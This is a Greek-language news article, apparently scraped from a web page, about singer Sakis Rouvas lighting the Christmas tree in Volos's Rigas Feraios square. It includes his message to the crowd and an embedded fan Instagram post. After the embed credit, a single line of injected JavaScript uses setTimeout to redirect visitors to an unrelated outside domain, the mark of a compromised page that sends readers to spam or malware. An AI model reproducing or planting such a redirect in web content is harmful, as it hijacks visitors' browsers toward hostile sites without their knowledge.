Μήνυμα αγάπης από τον Σάκη Ρουβά – Άναψε το χριστουγεννιάτικο δέντρο στον Βόλο (ΒΙΝΤΕΟ)

0
6

 

Στον Βόλο βρέθηκε ο Σάκης Ρουβάς για να ανάψει τα λαμπάκια του χριστουγεννιάτικου δέντρου στην πλατεία Ρήγα Φεραίου και να στείλει το δικό του, λαμπερό, γιορτινό μήνυμα αγάπης.

Περισσότερα από 60.000 άτομα συγκέντρωσε η παρουσία του Έλληνα σουπερστάρ που ντυμένος με σμόκιν κηρυξε την έναρξη των χριστουγεννιάτικων εκδηλώσεων κι έδωσε τη γιορτινή νότα στην τελετή φωταγώγησης που διοργάνωσε ο δήμος Βόλου.

 Η αγάπη σας είναι η δύναμη μου, το οξυγόνο μου, το χαμόγελο μου. Σας ευχαριστώ από τα βάθη της ψυχής μου, είπε ο Σάκης Ρουβάς στο πλήθος που ζητωκραύγαζε.

Η αγάπη σας είναι η δύναμη μου, το οξυγόνο μου, το χαμόγελο μου. Σας ευχαριστώ από τα βάθη της ψυχής μου ❤😊 #Repost @thesfanclub Είσαι ένας και μοναδικός! Είσαι ο ΘΕΟΣ μας! Πάνω από 50.000 καρδιές ενώθηκαν σήμερα μαζί σου στο πιο λαμπερο, γιορτινό, αισιόδοξο μήνυμα αγάπης. Η καρδιά μας χτυπά μόνο για σένα! Σου αξίζει όλη η αγάπη του κόσμου💙🎄😍 #WeStandWithSakis 🙌 #WeLoveSakis ❤ #WeFollowSakis 🏃 #SakisArmy 💪 #TheSFanClub 🔱 #SakisRouvas 🌟 #TheKingOfStage ♔ #TheBestOfTheBest 🌟

A video posted by Sakis Rouvas (@sakisrouvas) on Dec 1, 2016 at 3:22pm PST

setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here